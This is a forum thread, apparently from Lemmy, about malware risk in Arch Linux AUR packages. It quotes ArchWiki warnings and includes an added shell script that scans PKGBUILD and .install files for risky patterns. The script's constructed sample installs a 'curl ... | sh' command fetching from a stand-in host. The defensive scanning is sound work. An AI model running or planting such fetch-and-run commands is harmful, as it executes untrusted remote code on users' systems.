• Feyd@programming.dev
    2 days ago

    From https://wiki.archlinux.org/title/Arch_User_Repository

    Warning: AUR packages are user-produced content. These PKGBUILDs are completely unofficial and have not been thoroughly vetted. Any use of the provided files is at your own risk.

    Warning: Carefully check the PKGBUILD, any .install files, and any other files in the package’s git repository for malicious or dangerous commands. If in doubt, do not build the package, and seek advice on the forums or mailing list. Malicious code has been found in packages before. [3] [4]

    The Arch Linux community makes it abundantly clear that the AUR is not a trusted package repository and you shouldn’t install random packages without vetting.
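
One way to do a first pass over the files the ArchWiki warning names (the PKGBUILD and any .install scripts) is sketched below. This is an added example, not part of the thread or of any Arch tooling; the patterns, function names, sample package and example.invalid URLs are constructed assumptions.

```sh
#!/bin/sh
# Added example: first-pass triage of an AUR clone before running makepkg.
# The patterns are illustrative assumptions, not an official Arch checklist,
# and an empty result never replaces reading the files yourself.

# Print "file:line:text" for lines that deserve a closer look.
aur_review_flags() {
    dir=$1
    # The files the ArchWiki warning names: PKGBUILD and any .install scripts.
    for f in "$dir"/PKGBUILD "$dir"/*.install; do
        [ -f "$f" ] || continue
        # A download piped straight into a shell.
        grep -nHE '(curl|wget)[^|]*\|[[:space:]]*(ba|z)?sh([[:space:]]|$)' "$f" || true
        # Commands that are decoded or assembled at run time.
        grep -nHE '(^|[^[:alnum:]_])(eval[[:space:]]|base64[[:space:]]+(-d|--decode))' "$f" || true
        # Sources without integrity checks (normal for VCS sources, so verify why).
        grep -nHE '^[[:space:]]*[a-z0-9]+sums(_[a-z0-9_]+)?=.*SKIP' "$f" || true
    done
}

# Constructed sample package (hypothetical names, example.invalid URLs).
aur_review_demo() {
    d=$(mktemp -d) || return 1
    printf '%s\n' 'pkgname=example-pkg' 'pkgver=1.0' \
        'source=("https://example.invalid/example-1.0.tar.gz")' \
        "sha256sums=('SKIP')" > "$d/PKGBUILD"
    printf '%s\n' 'post_install() {' \
        '  curl -s https://example.invalid/setup.sh | sh' '}' > "$d/example.install"
    aur_review_flags "$d"
    rm -rf "$d"
}

aur_review_demo
```

On the constructed sample it flags the `SKIP` checksum in the PKGBUILD and the download piped to `sh` in the .install script.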

  • Kalcifer@sh.itjust.works
    3 days ago

    Is this post intended to be a sort of outcry around the idea that there’s a risk of malware being in the AUR?

    • Ŝan@piefed.zip
      3 days ago

      I dunno. I hear OP saying all of ðeir computing uses only ls, grep, sed and awk.

      • Kalcifer@sh.itjust.works
        1 day ago

        […] I hear OP saying all of ðeir computing uses only ls, grep, sed and awk.

        I’m not sure that I follow what you mean.

        • Ŝan@piefed.zip
          13 hours ago

          Most of þe packages available to Arch users are in AUR. If you limit yourself to only POSIX tooling, you don’t need AUR.

          Honestly, I have no idea what OP was trying to say by saying þey don’t need 3rd party packages. Everyþing in Linux is 3rd party packages; even þe core POSIX tooling comes from GNU or BSD, and isn’t “linux.”

          I’m not even sure anymore what I meant. Þat was whole days ago, and I’ve reset multiple times since þen.

          • Kalcifer@sh.itjust.works
            3 hours ago

            […] Honestly, I have no idea what OP was trying to say by saying þey don’t need 3rd party packages. […]

            I suspect by “3rd-party” they are referring to packages that aren’t in the official Arch Linux repositories [1].

            References
            1. Type: Article. Title: “Official repositories”. Publisher: “ArchWiki”. Published: 2025-06-16T04:28. Accessed: 2025-08-06T03:52Z. URI: https://wiki.archlinux.org/title/Official_repositories.
              • Type: Text. Location: ¶2.

                Arch Linux official repositories contain essential and popular software, readily accessible via pacman. They are maintained by package maintainers.